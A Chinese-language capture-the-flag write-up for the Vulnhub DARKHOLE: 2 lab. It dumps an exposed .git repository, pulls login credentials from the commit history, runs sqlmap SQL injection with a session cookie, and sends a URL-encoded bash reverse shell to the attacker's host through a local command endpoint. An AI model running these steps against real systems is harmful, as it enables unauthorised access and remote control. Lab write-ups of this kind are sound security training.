title: 'Vulnhub-DARKHOLE: 2'
abbrlink: 334e7ff1
date: 2022-12-02 09:25:19

tags:

描述

Difficulty:Hard

This works better with VMware rather than VirtualBox

Hint: Don't waste your time For Brute-Force


nmap扫存活

image-20221202095901216

kali 192.168.169.220
靶机  192.168.169.230 
Undefined

nmap扫描靶机

image-20221202100023256

端口 22 80
 Git repository  git泄露
Undefined

目录

image-20221202100802985

image-20221202100909249

使用git工具

https://github.com/arthaud/git-dumper
Bash

image-20221202102602565

  • 运行 git_dumper.py
python3 git_dumper.py http://192.168.169.230/.git/ website
Bash

image-20221202102643192

查看文件

image-20221202103234430

image-20221202103307141

一个登录页面 需要邮箱密码
Undefined

image-20221202103413841

git log

image-20221202103534052

查看修改历史
Undefined

image-20221202103823310

image-20221202103750063

发现账号密码
Undefined
```
if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
Bash

登陆测试

image-20221202104106972

image-20221202104408751

看url 有注入点
Undefined

注入

  • 要带上cookie

image-20221202104907306

sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie  PHPSESSID=3ca3jbi4mk3749bv84uu4supol  --dbs
Lua

image-20221202105029498

image-20221202105122261

  • ssh

image-20221202105930738

  • users

image-20221202110420275

ssh

ssh jehad@192.168.169.230
CSS

image-20221202110609619

image-20221202110814345

image-20221202110923926

find / -user root -perm -4000 -print 2>/dev/null
JavaScript
  • 查看定时任务
cat  /etc/crontab
Bash

image-20221202111256422

  • 查看一下 /opt/web:

    cat /opt/web/index.php
    
    Bash

image-20221202111828200

  • 看下 tcp 进程:
netstat -tlnp
Undefined

image-20221202111948556

image-20221202112257290

可以运行cmd
Undefined

写入shell

  • 开启监听
  • 进行url编码
bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
Bash
```
bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
Shell
  • 写入
curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'"
Perl

image-20221202113531327

image-20221202113644882

  • 查看历史命令

image-20221202113803704

image-20221202114200481

切换用户

image-20221202114041541

image-20221202114224031

提权

image-20221202114320065

image-20221202114515914

image-20221202114548430